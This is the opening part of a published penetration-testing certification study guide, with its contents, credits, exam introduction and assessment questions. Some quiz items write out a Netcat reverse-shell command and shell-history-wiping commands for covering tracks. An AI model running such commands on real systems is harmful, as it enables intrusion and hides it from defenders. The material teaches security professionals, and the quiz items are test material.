CompTIA PenTest+ Study Guide E-Book

Table of Contents

Cover

Table of Contents

Title Page

Copyright

Dedication

Acknowledgments

About the Authors

About the Technical Editor

Introduction

CompTIA

The PenTest+ Exam

What Does This Book Cover?

CompTIA PenTest+ Certification Exam Objectives

How to Contact the Publisher

Assessment Test

Answers to Assessment Test

Chapter 1: Penetration Testing

What Is Penetration Testing?

Reasons for Penetration Testing

Who Performs Penetration Tests?

The CompTIA Penetration Testing Process

The Cyber Kill Chain

Tools of the Trade

Summary

Exam Essentials

Lab Exercises

Chapter 2: Planning and Scoping Penetration Tests

Summarizing Pre‐engagement Activities

Shared Responsibility Model

Key Legal Concepts for Penetration Tests

Regulatory Compliance Considerations

Penetration Testing Standards and Methodologies

Threat Modeling Frameworks

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 3: Information Gathering

Reconnaissance and Enumeration

Active Reconnaissance and Enumeration

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 4: Vulnerability Scanning

Identifying Vulnerability Management Requirements

Configuring and Executing Vulnerability Scans

Software Security Testing

Developing a Remediation Workflow

Overcoming Barriers to Vulnerability Scanning

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 5: Analyzing Vulnerability Scans

Reviewing and Interpreting Scan Reports

Validating Scan Results

Common Vulnerabilities

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 6: Exploit and Pivot

Exploits and Attacks

Pivoting and Lateral Movement

Exploitation Toolkits and Tools

Exploit Specifics

Leveraging Exploits

Persistence and Evasion

Covering Your Tracks

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 7: Exploiting Network Vulnerabilities

Identifying Exploits

Conducting Network Exploits

Exploiting Windows Services

Identifying and Exploiting Common Services

Wireless Exploits

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 8: Exploiting Physical and Social Vulnerabilities

Exploiting Physical Vulnerabilities

Exploiting Social Vulnerabilities

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 9: Exploiting Application Vulnerabilities

Exploiting Injection Vulnerabilities

Exploiting Authentication Vulnerabilities

Exploiting Authorization Vulnerabilities

Exploiting Web Application Vulnerabilities

Unsecure Coding Practices

Application Testing Tools

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 10: Exploiting Host Vulnerabilities

Attacking Hosts

Credential Attacks and Testing Tools

Remote Access

Attacking Virtual Machines and Containers

Attacking Cloud Technologies

Attacking Mobile Devices

Attacking Artificial Intelligence (AI)

Attacking IoT, ICS, Embedded Systems, and SCADA Devices

Attacking Data Storage

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 11: Reporting and Communication

The Importance of Collaboration and Communication

Recommending Mitigation Strategies

Writing a Penetration Testing Report

Wrapping Up the Engagement

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 12: Scripting for Penetration Testing

Scripting and Penetration Testing

Variables, Arrays, and Substitutions

Comparison Operations

String Operations

Flow Control

Input and Output (I/O)

Error Handling

Reusing Code

The Role of Coding in Penetration Testing

Summary

Exam Essentials

Lab Exercises

Review Questions

Appendix A: Answers to Review Questions

Chapter 2: Planning and Scoping Penetration Tests

Chapter 3: Information Gathering

Chapter 4: Vulnerability Scanning

Chapter 5: Analyzing Vulnerability Scans

Chapter 6: Exploit and Pivot

Chapter 7: Exploiting Network Vulnerabilities

Chapter 8: Exploiting Physical and Social Vulnerabilities

Chapter 9: Exploiting Application Vulnerabilities

Chapter 10: Exploiting Host Vulnerabilities

Chapter 11: Reporting and Communication

Chapter 12: Scripting for Penetration Testing

Appendix B: Solution to Lab Exercise

Solution to Activity 5.2: Analyzing a CVSS Vector

Index

End User License Agreement

List of Tables

Chapter 3

TABLE 3.1 Common ports and services

Chapter 5

TABLE 5.1 CVSS attack vector metric

TABLE 5.2 CVSS attack complexity metric

TABLE 5.3 CVSS attack requirements metric

TABLE 5.4 CVSS privileges required metric

TABLE 5.5 CVSS user interaction metric

TABLE 5.6 CVSS confidentiality metrics

TABLE 5.7 CVSS integrity metrics

TABLE 5.8 CVSS availability metrics

TABLE 5.9 CVSS Qualitative Severity Rating Scale

Chapter 6

TABLE 6.1 Metasploit exploit quality ratings

TABLE 6.2 Metasploit search terms

List of Illustrations

Chapter 1

FIGURE 1.1 The CIA triad

FIGURE 1.2 The DAD triad

FIGURE 1.3 CompTIA penetration testing stages

FIGURE 1.4 The Cyber Kill Chain framework

Chapter 2

FIGURE 2.1 A logical dataflow diagram

FIGURE 2.2 Microsoft Shared Responsibility Matrix

Chapter 3

FIGURE 3.1 nslookup for Netflix.com

FIGURE 3.2 WHOIS of 52.41.111.100

FIGURE 3.3

tracert

of Netflix.com

FIGURE 3.4 Shodan result from an exposed Cisco device

FIGURE 3.5 Censys IOS host view

FIGURE 3.6 A Google search for

passwords.xls

FIGURE 3.7 Zenmap topology view

FIGURE 3.8 Scapy packet crafting for a TCP ping

FIGURE 3.9 ARP query and response

FIGURE 3.10 Nmap scan using OS identification

FIGURE 3.11 Nmap output of a Windows 10 system

FIGURE 3.12 Harvesting emails using Metasploit

FIGURE 3.13 Using the Wayback Machine

FIGURE 3.14 Using recon‐ng

FIGURE 3.15 Using Censys.io

FIGURE 3.16 Using DNSDumpster

FIGURE 3.17 Mapping the attack surface

FIGURE 3.18 Using theHarvester

FIGURE 3.19 Using WiGLE.net

FIGURE 3.20 Using OSINT Framework

Chapter 4

FIGURE 4.1 FIPS 199 Standards

FIGURE 4.2 Qualys asset map

FIGURE 4.3 Configuring a Nessus scan

FIGURE 4.4 Sample Nessus scan report

FIGURE 4.5 Nessus scan templates

FIGURE 4.6 Disabling unused plug‐ins

FIGURE 4.7 Configuring authenticated scanning

FIGURE 4.8 Choosing a scan appliance

FIGURE 4.9 National Cyber Awareness System Vulnerability Summary

FIGURE 4.10 Setting automatic updates in Nessus

FIGURE 4.11 Acunetix web application scan vulnerability report

FIGURE 4.12 Nikto web application scan results

FIGURE 4.13 Nessus web application scanner

FIGURE 4.14 Vulnerability management life cycle

FIGURE 4.15 Qualys scan performance settings

Chapter 5

FIGURE 5.1 Nessus vulnerability scan report

FIGURE 5.2 Qualys vulnerability scan report

FIGURE 5.3 OpenVAS vulnerability scan report

FIGURE 5.4 CVSS 4.0 Calculator

FIGURE 5.5 Scan report showing vulnerabilities and best practices

FIGURE 5.6 Vulnerability trend analysis

FIGURE 5.7 Missing patch vulnerability

FIGURE 5.8 Unsupported operating system vulnerability

FIGURE 5.9 Code execution vulnerability

FIGURE 5.10 FTP cleartext authentication vulnerability

FIGURE 5.11 Debug mode vulnerability

FIGURE 5.12 Outdated SSL version vulnerability

FIGURE 5.13 Insecure SSL cipher vulnerability

FIGURE 5.14 Invalid certificate warning

FIGURE 5.15 DNS amplification vulnerability

FIGURE 5.16 Internal IP disclosure vulnerability

FIGURE 5.17 Inside a virtual host

FIGURE 5.18 SQL injection vulnerability

FIGURE 5.19 Cross‐site scripting vulnerability

Chapter 6

FIGURE 6.1 OpenVAS/Greenbone vulnerability report

FIGURE 6.2 Pivoting

FIGURE 6.3 Distributed Ruby vulnerability

FIGURE 6.4

phpinfo()

output accessible

FIGURE 6.5

phpinfo.php

output

FIGURE 6.6 The Metasploit console

FIGURE 6.7 Running

show exploits

in Metasploit

FIGURE 6.8 Selecting an exploit

FIGURE 6.9 Setting module options

FIGURE 6.10 Successful exploit

FIGURE 6.11 Using the command prompt

FIGURE 6.12 WMImplant WMI tools

FIGURE 6.13 CrackMapExec's main screen

FIGURE 6.14 Responder capture flow

FIGURE 6.15 Pass‐the‐hash flow

FIGURE 6.16 John the Ripper

Chapter 7

FIGURE 7.1 Double‐tagged Ethernet packet

FIGURE 7.2 Yersinia 802.1q attack selection

FIGURE 7.3 DNS cache poisoning attack

FIGURE 7.4 ARP spoofing

FIGURE 7.5 Manually configuring a MAC address in Windows 10

FIGURE 7.6 Metasploit SYN flood

FIGURE 7.7 NetBIOS name service attack

FIGURE 7.8 Responder sending poisoned answers

FIGURE 7.9 Responder capturing hashes

FIGURE 7.10 Output from

snmpwalk

FIGURE 7.11 THC Hydra SSH brute‐force attack

FIGURE 7.12 WiGLE map showing access point density in a metropolitan area

FIGURE 7.13 RFID cloner and tags

Chapter 8

FIGURE 8.1 A typical security vestibule design

FIGURE 8.2 SET menu

FIGURE 8.3 SET loading the Metasploit reverse TCP handler

FIGURE 8.4 BeEF hooked browser detail

FIGURE 8.5 BeEF commands usable in a hooked browser

Chapter 9

FIGURE 9.1 Web application firewall

FIGURE 9.2 Account number input page

FIGURE 9.3 Account information page

FIGURE 9.4 Account information page after blind SQL injection

FIGURE 9.5 Account creation page

FIGURE 9.6 Zyxel router default password

FIGURE 9.7 Session authentication with cookies

FIGURE 9.8 Session cookie from CNN.com

FIGURE 9.9 Session hijacking with cookies

FIGURE 9.10 Kerberos authentication process

FIGURE 9.11 Example web server directory structure

FIGURE 9.12 Directory scanning with DirBuster

FIGURE 9.13 Message board post rendered in a browser

FIGURE 9.14 XSS attack rendered in a browser

FIGURE 9.15 SQL error disclosure

FIGURE 9.16 Zed Attack Proxy (ZAP)

FIGURE 9.17 Burp Proxy

FIGURE 9.18 Postman

FIGURE 9.19 Wfuzz performing fuzz testing

FIGURE 9.20 Gobuster DNS enumeration

FIGURE 9.21 WPScan WordPress vulnerability scanner

FIGURE 9.22 Scanning a database‐backed application with sqlmap

Chapter 10

FIGURE 10.1 SUID files in Kali

FIGURE 10.2 SUID files with details

FIGURE 10.3 Abusing

sudo

rights

FIGURE 10.4 Checking Linux kernel version information

FIGURE 10.5 Dumping the Windows SAM with Mimikatz

FIGURE 10.6 Hashcat cracking Linux passwords

FIGURE 10.7 Metasploit reverse TCP shell

FIGURE 10.8 Detecting virtualization on a Windows system

FIGURE 10.9 Detecting virtualization on Kali Linux

FIGURE 10.10 Side‐channel attack against a virtual machine

FIGURE 10.11 A simple SCADA environment design example

Chapter 11

FIGURE 11.1 Smartphone‐based multifactor authentication

Chapter 12

FIGURE 12.1 Identifying the language of a conditional execution statement

FIGURE 12.2 Identifying the language of a

for

loop

FIGURE 12.3 Identifying the language of a

while

loop

Guide

Cover

Table of Contents

Title Page

Copyright

Dedication

Acknowledgments

About the Author

About the Technical Editor

Introduction

Assessment Test

Begin Reading

Appendix A: Answers to Review Questions

Appendix B: Solution to Lab Exercise

Index

End User License Agreement

Pages

i

v

vi

vii

ix

xi

xii

xiii

xxix

xxx

xxxi

xxxii

xxxiii

xxxiv

xxxv

xxxvi

xxxvii

xxxviii

xxxix

xl

xli

xlii

xliii

xliv

xlv

xlvi

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

305

306

307

308

309

310

311

312

313

314

315

316

317

318

319

320

321

322

323

324

325

326

327

329

330

331

332

333

334

335

336

337

338

339

340

341

342

343

344

345

346

347

348

349

350

351

352

353

354

355

356

357

358

359

360

361

362

363

364

365

366

367

368

369

370

371

372

373

374

375

376

377

379

380

381

382

383

384

385

386

387

388

389

390

391

392

393

394

395

396

397

398

399

400

401

402

403

404

405

406

407

408

409

410

411

412

413

414

415

416

417

418

419

420

421

422

423

424

425

426

427

428

429

430

431

432

433

434

435

436

437

438

439

440

441

443

444

445

446

447

448

449

450

451

452

453

454

455

456

457

458

459

460

461

462

463

464

465

466

467

468

469

471

472

473

474

475

476

477

478

479

480

481

482

483

484

485

486

487

488

489

490

491

492

493

494

495

496

497

498

499

500

501

502

503

504

505

506

507

508

509

510

511

512

513

515

516

517

518

519

520

521

522

523

524

525

526

527

528

529

530

531

532

533

534

535

536

537

539

540

541

542

543

544

545

546

547

548

549

550

551

552

553

554

555

556

557

558

559

561

562

563

CompTIA®PenTest+®Study Guide

Exam PT0‐003

Third Edition

Copyright © 2025 by John Wiley & Sons, Inc. All rights, including for text and data mining, AI training, and similar technologies, are reserved.

Published by John Wiley & Sons, Inc., Hoboken, New Jersey.

Published simultaneously in Canada and the United Kingdom.

ISBNs: 9781394285006 (paperback), 9781394285020 (ePDF), 9781394285013 (ePub)

No part of this publication may be reproduced, stored in a retrieval system, or transmitted in any form or by any means, electronic, mechanical, photocopying, recording, scanning, or otherwise, except as permitted under Section 107 or 108 of the 1976 United States Copyright Act, without either the prior written permission of the Publisher, or authorization through payment of the appropriate per‐copy fee to the Copyright Clearance Center, Inc., 222 Rosewood Drive, Danvers, MA 01923, (978) 750‐8400, fax (978) 750‐4470, or on the web at www.copyright.com. Requests to the Publisher for permission should be addressed to the Permissions Department, John Wiley & Sons, Inc., 111 River Street, Hoboken, NJ 07030, (201) 748‐6011, fax (201) 748‐6008, or online at www.wiley.com/go/permission.

The manufacturer’s authorized representative according to the EU General Product Safety Regulation is Wiley‐VCH GmbH, Boschstr. 12, 69469 Weinheim, Germany, e‐mail: [email protected].

Trademarks: WILEY, the Wiley logo, and Sybex are trademarks or registered trademarks of John Wiley & Sons, Inc. and/or its affiliates, in the United States and other countries, and may not be used without written permission. CompTIA and PenTest+ are trademarks or registered trademarks of The Computing Technology Industry Association, Inc. All other trademarks are the property of their respective owners. John Wiley & Sons, Inc. is not associated with any product or vendor mentioned in this book.

Limit of Liability/Disclaimer of Warranty: While the publisher and authors have used their best efforts in preparing this book, they make no representations or warranties with respect to the accuracy or completeness of the contents of this book and specifically disclaim any implied warranties of merchantability or fitness for a particular purpose. No warranty may be created or extended by sales representatives or written sales materials. The advice and strategies contained herein may not be suitable for your situation. You should consult with a professional where appropriate. Further, readers should be aware that websites listed in this work may have changed or disappeared between when this work was written and when it is read. Neither the publisher nor authors shall be liable for any loss of profit or any other commercial damages, including but not limited to special, incidental, consequential, or other damages.

For general information on our other products and services, please contact our Customer Care Department within the United States at (800) 762‐2974, outside the United States at (317) 572‐ 3993. For product technical support, you can find answers to frequently asked questions or reach us via live chat at https://sybexsupport.wiley.com.

Wiley also publishes its books in a variety of electronic formats. Some content that appears in print may not be available in electronic formats. For more information about Wiley products, visit our web site at www.wiley.com.

Library of Congress Control Number: 2025930423

Cover image: © Jeremy Woodhouse/Getty Images

Cover design: Wiley

This book is dedicated to Shahla Pirnia, in deepest gratitude for your unwavering dedication and meticulous care, which have shaped so many of my works. Your attention to detail and passion for excellence will always inspire me. May your legacy live on in every word we've crafted together.

— Mike

Acknowledgments

Books like this involve work from many people, and as authors, we truly appreciate the hard work and dedication that the team at Wiley shows. We would especially like to thank Senior Acquisitions Editor Kenyon Brown. We have worked with Ken on multiple projects and consistently enjoy our work with him.

We also greatly appreciated the editing and production team for the book, including Pete Gaughan, managing editor, who made sure everything worked smoothly; Christine O'Connor, our project manager, whose prompt and consistent oversight got this book out the door; and Saravanan Dakshinamurthy, our content refinement specialist, who guided us through layouts, formatting, and final cleanup to produce a great book. We'd also like to thank our technical editor, Rishalin Pillay, who provided us with thought‐provoking questions and technical insight throughout the process. We would also like to thank the many behind‐the‐scenes contributors, including the graphics, production, and technical teams who make the book and companion materials into a finished product.

Our agent, Carole Jelen of Waterside Productions, continues to provide us with wonderful opportunities, advice, and assistance throughout our writing careers.

Finally, we would like to thank our families, friends, and significant others who support us through the late evenings, busy weekends, and long hours that a book like this requires to write, edit, and get to press.

About the Authors

Mike Chapple, PhD, Security+, CISSP, CISA, PenTest+, CySA+, is a teaching professor of IT, analytics, and operations at the University of Notre Dame. He is also the academic director of the University's master's program in business analytics.

Mike is a cybersecurity professional with over 25 years of experience in the field. Prior to his current role, Mike served as senior director for IT service delivery at Notre Dame, where he oversaw the university's cybersecurity program, cloud computing efforts, and other areas. Mike also previously served as chief information officer of Brand Institute and as an information security researcher with the National Security Agency and the U.S. Air Force.

Mike is a frequent contributor to several magazines and websites and is the author or coauthor of more than 50 books, including CISSP Official ISC2 Study Guide (Wiley, 2024), CISSP Official ISC2 Practice Tests (Wiley, 2024), CompTIA Security+ Study Guide (Wiley, 2023), CompTIA CySA+ Study Guide (Wiley, 2023), CompTIA CySA+ Practice Tests (Wiley, 2023), and Cybersecurity: Information Operations in a Connected World (Jones and Bartlett, 2021).

Mike offers free study groups for the PenTest+, CySA+, Security+, CISSP, and other major certifications at his website, http://certmike.com.

Robert Shimonski, CASP+, CySA+, PenTest+, Security+, is a technology executive specializing in health care IT for one of the largest health systems in America. In his current role, Rob is responsible for bringing operational support and incident response into the future with the help of new technologies such as cloud and artificial intelligence. His current focus is on deploying securely to Cloud (Azure, AWS, and Google), DevOps, DevSecOps and AIOps. Rob has spent over 25 years in the technology “trenches” handling networking and security architecture, design, engineering, testing, and development efforts for global projects. A go‐to person for all things security‐related, Rob has been a major force in deploying security‐related systems for many years. Rob also worked for various companies reviewing and developing curriculum as well as other security‐related books, technical articles, and publications based on technology deployment, testing, hacking, pen testing, and many other aspects of security. Rob holds dozens of technology certifications to include 20+ CompTIA certifications, SANS.org GIAC, GSEC, and GCIH as well as many vendor‐based cloud specialized certifications from Google, Microsoft Azure, and Amazon Web Services. Rob is considered a leading expert in prepping others to achieve certification success.

David Seidl, CISSP, PenTest+, is vice president for information technology and CIO at Miami University. During his IT career, he has served in a variety of technical and information security roles, including serving as the senior director for campus technology services at the University of Notre Dame, where he co‐led Notre Dame's move to the cloud and oversaw cloud operations, ERP, databases, identity management, and a broad range of other technologies and services. He also served as Notre Dame's director of information security and led Notre Dame's information security program. He has taught information security and networking undergraduate courses as an instructor for Notre Dame's Mendoza College of Business, and he has written books on security certification and cyberwarfare, including co‐authoring the previous editions of CISSP (ISC)2Official Practice Tests (Sybex, 2018) as well as CISSP Official (ISC)2Practice Tests (Wiley, 2021), CompTIA Security+ Study Guide (Wiley, 2020), CompTIA Security+ Practice Tests (Wiley, 2020), CompTIA CySA+ Study Guide (Wiley, 2020), CompTIA CySA+ Practice Tests (Wiley, 2020), and Cybersecurity: Information Operations in a Connected World (Jones and Bartlett, 2021), and CompTIA Security+ Practice Tests: Exam SY0‐601 (Sybex, 2021), as well as other certification guides and books on information security.

David holds a bachelor's degree in communication technology and a master's degree in information security from Eastern Michigan University, as well as CISSP, CySA+, PenTest+, GPEN, and GCIH certifications.

About the Technical Editor

Rishalin Pillay is a seasoned cybersecurity expert with extensive experience in offensive security, cloud security, threat, and incident response, and is recognized as a trusted authority in the field. As an accomplished Pluralsight author, he has created in‐depth courses like Red Team Tools and Threat Protection, and has authored or coauthored influential books such as Learn Penetration Testing (Packt Publishing, 2019), Ethical Hacking Workshop (Packt Publishing, 2023), and Offensive Shellcode from Scratch (Packt Publishing, 2022). Additionally, Rishalin has contributed to numerous publications on topics including dark web analysis, Kali Linux, security operations, and essential study guides for networking and Microsoft technologies. His dedication to advancing the field has earned him prestigious accolades, including the Microsoft Content Publisher Gold and Platinum awards and the Event Speaker Gold award, reflecting his impactful presence as a writer, educator, and Tier‐1 business event speaker. Whether through writing, teaching, or presenting, Rishalin continues to make a lasting impact on the cybersecurity industry.

Introduction

The CompTIA®PenTest+® Study Guide: Exam PT0‐003, Third Edition, provides accessible explanations and real‐world knowledge about the exam objectives that make up the PenTest+ certification. This book will help you to assess your knowledge before taking the exam, as well as provide a stepping‐stone to further learning in areas where you may want to expand your skill set or expertise.

Before you tackle the PenTest+ exam, you should already be a security practitioner. CompTIA suggests that test‐takers should have intermediate‐level skills based on their cybersecurity pathway. You should also be familiar with at least some of the tools and techniques described in this book. You don't need to know every tool, but understanding how to use existing experience to approach a new scenario, tool, or technology that you may not know is critical to passing the PenTest+ exam.

CompTIA

CompTIA is a nonprofit trade organization that offers certification in a variety of IT areas, ranging from the skills that a PC support technician needs, which are covered in the A+ exam, to advanced certifications like the SecurityX, certification. CompTIA divides its exams into categories based on what topics it covers, as shown in the following table:

Core

Infrastructure

Cybersecurity

Tech+ A+ Network+ Security+

Cloud+ Linux+ Server+

CySA+ SecurityX PenTest+

CompTIA recommends that practitioners follow a cybersecurity career path that begins with Tech+ and A+ certifications and proceeds to include the Network+ and Security+ credentials to complete the core skills. From there, cybersecurity professionals may choose the PenTest+ and/or Cybersecurity Analyst+ (CySA+) certifications before attempting the SecurityX certification as a capstone credential.

The CySA+ and PenTest+ exams are more advanced exams, intended for professionals with hands‐on experience who also possess the knowledge covered by the prior exams.

CompTIA certifications are ISO/ANAB accredited, and they are used throughout multiple industries as a measure of technical skill and knowledge. In addition, CompTIA certifications, including the Security+ and the SecurityX, have been approved by the U.S. government as Information Assurance baseline certifications and are included in the State Department's Skills Incentive Program.

The PenTest+ Exam

The PenTest+ exam is designed to be a vendor‐neutral certification for penetration testers. It is intended to assess penetration testing engagement, reconnaissance, vulnerability assessment, and attacks and exploits, with a focus on network resiliency testing. Successful test‐takers will prove their ability plan and scope assessments, handle legal and compliance requirements, and perform vulnerability scanning and penetration testing activities using a variety of tools and techniques, and then analyze the results of those activities.

It covers five major domains:

Engagement Management

Reconnaissance and Enumeration

Vulnerability Discovery and Analysis

Attacks and Exploits

Post‐exploitation and Lateral Movement

These five areas include a range of subtopics, from scoping penetration tests to performing host enumeration and exploits, while focusing heavily on scenario‐based learning.

The PenTest+ exam fits between the entry‐level Security+ exam and the SecurityX (formerly CompTIA Advanced Security Practitioner [CASP+]) certification, providing a mid‐career certification for those who are seeking the next step in their certification and career path while specializing in pentesting or vulnerability management.

The PenTest+ exam is conducted in a format that CompTIA calls “performance‐based questions (PBQs).” This means that the exam uses hands‐on simulations using actual security tools and scenarios to perform tasks that match those found in the daily work of a security practitioner. There may be numerous types of exam questions, such as multiple‐choice, fill‐in‐the‐blank, multiple‐response, drag‐and‐drop, and image‐based problems.

CompTIA recommends that test‐takers have three or four years of experience as a penetration tester before taking this exam. As of 2024, the exam costs $404 in the United States, with roughly equivalent prices in other locations around the globe. More details about the PenTest+ exam and how to take it can be found at:

https://www.comptia.org/certifications/pentest

Study and Exam Preparation Tips

A test preparation book like this cannot teach you every possible security software package, scenario, and specific technology that may appear on the exam. Instead, you should focus on whether you are familiar with the type or category of technology, tool, process, or scenario presented as you read the book. If you identify a gap, you may want to find additional tools to help you learn more about those topics.

Additional resources for hands‐on exercises include the following:

Exploit-Exercises.com

provides virtual machines, documentation, and challenges covering a wide range of security issues at

https://exploit-exercises.com

.

Hacking‐Lab provides capture‐the‐flag (CTF) exercises in a variety of fields at

https://hacking-lab.com

.

The OWASP Hacking Lab provides excellent web application–focused exercises at

https://owasp.org/www-project-hacking-lab

.

PentesterLab provides a subscription‐based access to penetration testing exercises at

https://pentesterlab.com/exercises

.

Since the exam uses scenario‐based learning, expect the questions to involve analysis and thought rather than relying on simple memorization. As you might expect, it is impossible to replicate that experience in a book, so the questions here are intended to help you be confident that you know the topic well enough to think through hands‐on exercises.

Taking the Exam

Once you are fully prepared to take the exam, you can visit the CompTIA website to purchase your exam voucher:

http://store.comptia.org

Currently, CompTIA offers two options for taking the exam: an in‐person exam at a testing center and an at‐home exam that you take on your own computer.

This book includes a coupon that you may use to save 10 percent on your CompTIA exam registration.

In‐Person Exams

CompTIA partners with Pearson VUE's testing centers, so your next step will be to locate a testing center near you. In the United States, you can do this based on your address or your ZIP code, while non‐U.S. test takers may find it easier to enter their city and country. You can search for a test center near you at the Pearson VUE website, where you will need to navigate to “Find a test center.”

https://www.pearsonvue.com/us/en/comptia.html

Now that you know where you'd like to take the exam, simply use the link on that site to set up a testing account and schedule an exam.

On the day of the test, take two forms of identification, and make sure to show up with plenty of time before the exam starts. Remember that you will not be able to take your notes, electronic devices (including smartphones and watches), or other materials in with you.

At‐Home Exams

CompTIA began offering online exam proctoring in 2020 through the OnVUE program. Candidates using this approach will take the exam at their home or office and be proctored over a webcam by a remote proctor. For more information on the at‐home testing option, visit:

https://www.pearsonvue.com/us/en/comptia/onvue.html

The OnVUE platform requires specialized software. Be sure to run the OnVUE system test before you register for an online exam. This will save you problems if your system is not compatible with the software.

After the PenTest+ Exam

Once you have taken the exam, you will be notified of your score immediately, so you'll know if you passed the test right away. You should keep track of your score report with your exam registration records and the email address you used to register for the exam. If you've passed, you'll receive a handsome certificate, similar to the one shown here:

Maintaining Your Certification

CompTIA certifications must be renewed on a periodic basis. To renew your certification, you can either pass the most current version of the exam, earn a qualifying higher‐level CompTIA or industry certification, or complete sufficient continuing education activities to earn enough continuing education units (CEUs) to renew it.

Assessment Test

If you're considering taking the PenTest+ exam, you should have already taken and passed the CompTIA Security+ and Network+ exams or have equivalent experience—typically at least three to four years of experience in the field. You may also already hold other equivalent or related certifications. The following assessment test will help to make sure you have the knowledge that you need before you tackle the PenTest+ certification, and it will help you determine where you may want to spend the most time with this book.

Ricky is conducting a penetration test against a web application and is looking for potential vulnerabilities to exploit. Which of the following vulnerabilities does not commonly exist in web applications?

SQL injection

VM escape

Buffer overflow

Cross‐site scripting

What specialized type of legal document is often used to protect the confidentiality of data and other information that penetration testers may encounter?

An SOW

An NDA

An MSA

A noncompete

Chris is assisting Ricky with his penetration test and would like to extend the vulnerability search to include the use of dynamic testing. Which one of the following tools can he use as an interception proxy?

ZAP

Nessus

SonarQube

OllyDbg

Matt is part of a penetration testing team and is using a standard toolkit developed by his team. He is executing a password cracking script named

password.sh

. What language is this script most likely written in?

PowerShell

Bash

Ruby

Python

Renee is conducting a penetration test and discovers evidence that one of the systems she is exploring was already compromised by an attacker. What action should she take immediately after confirming her suspicions?

Record the details in the penetration testing report.

Remediate the vulnerability that allowed her to gain access.

Report the potential compromise to the client.

No further action is necessary because Renee's scope of work is limited to penetration testing.

Which of the following vulnerability scanning methods will provide the most accurate detail during a scan?

Unknown environment

Authenticated

Internal view

External view

Annie wants to cover her tracks after compromising a Linux system. If she wants to permanently remove evidence of the commands she inputs to a Bash shell, which of the following commands should she use?

history ‐c

kill ‐9 $$

echo "" > /~/.bash_history

ln /dev/null ~/.bash_history ‐sf

Kaiden would like to perform an automated web application security scan of a new system before it is moved into production. Which one of the following tools is best suited for this task?

Nmap

Nikto

Wireshark

CeWL

Steve is engaged in a penetration test and is gathering information without actively scanning or otherwise probing his target. What type of information is he gathering?

OSINT

HSI

Background

None of the above

Which of the following activities constitutes a violation of integrity?

Systems were taken offline, resulting in a loss of business income.

Sensitive or proprietary information was changed or deleted.

Protected information was accessed or exfiltrated.

Sensitive personally identifiable information was accessed or exfiltrated.

Ted wants to scan a remote system using Nmap and uses the following command:

nmap 149.89.80.0/24

How many TCP ports will he scan?

256

1,000

1,024

65,535

Brian is conducting a thorough technical review of his organization's web servers. He is specifically looking for signs that the servers may have been breached in the past. What term best describes this activity?

Penetration testing

Vulnerability scanning

Remediation

Threat hunting

Liam executes the following command on a compromised system:

nc 10.1.10.1 7337 -e /bin/sh

What has he done?

Started a reverse shell using Netcat

Captured traffic on the Ethernet port to the console via Netcat

Set up a bind shell using Netcat

None of the above

Dan is attempting to use VLAN hopping to send traffic to VLANs other than the one he is on. What technique does the following diagram show?

A double jump

A powerhop

Double tagging

VLAN squeezing

Alaina wants to conduct an on‐path attack against a target system. What technique can she use to make it appear that she has the IP address of a trusted server?

ARP spoofing

IP proofing

DHCP pirating

Spoofmastering

Michael's social engineering attack relies on telling the staff members he contacts that others have provided the information that he is requesting. What motivation technique is he using?

Authority

Scarcity

Likeness

Social proof

Vincent wants to gain access to workstations at his target but cannot find a way into the building. What technique can he use to do this if he is also unable to gain access remotely or on‐site via the network?

Shoulder surfing

Kerberoasting

USB key drop

Quid pro quo

Jennifer is reviewing files in a directory on a Linux system and sees a file listed with the following attributes. What has she discovered?

-rwsr-xr—1 root kismet 653905 Nov 4 2016 /usr/bin/kismet_capture

An encrypted file

A hashed file

A SUID file

A SIP file

Which of the following tools is best suited to querying data provided by organizations like the American Registry for Internet Numbers (ARIN) as part of a footprinting or reconnaissance exercise?

Nmap

Traceroute

regmon

Whois

Chris believes that the Linux system he has compromised is a virtual machine. Which of the following techniques will not provide useful hints about whether or not the system is a VM?

Run

system‐detect‐virt

.

Run

ls ‐l /dev/disk/by‐id

.

Run

wmic

baseboard to get manufacturer, product.

Run

dmidecode

to retrieve hardware information.

Answers to Assessment Test

B. Web applications commonly experience SQL injection, buffer overflow, and cross‐site scripting vulnerabilities. Virtual machine (VM) escape attacks work against the hypervisor of a virtualization platform and are not generally exploitable over the web. You'll learn more about all of these vulnerabilities in

Chapters 5

and

9

.

B. A nondisclosure agreement (NDA) is a legal agreement that is designed to protect the confidentiality of the client's data and other information that the penetration tester may encounter during the test. An SOW is a statement of work, which defines what will be done during an engagement, an MSA is a master services agreement that sets the overall terms between two organizations (which then use SOWs to describe the actual work), and noncompetes are just that—an agreement that prevents competition, usually by preventing an employee from working for a competitor for a period of time after their current job ends. You'll learn more about the legal documents that are part of a penetration test in

Chapter 2

.

A. The Zed Attack Proxy (ZAP) from the Open Worldwide Application Security Project (OWASP) is an interception proxy that is very useful in penetration testing. Nessus is a vulnerability scanner that you'll learn more about in

Chapter 4

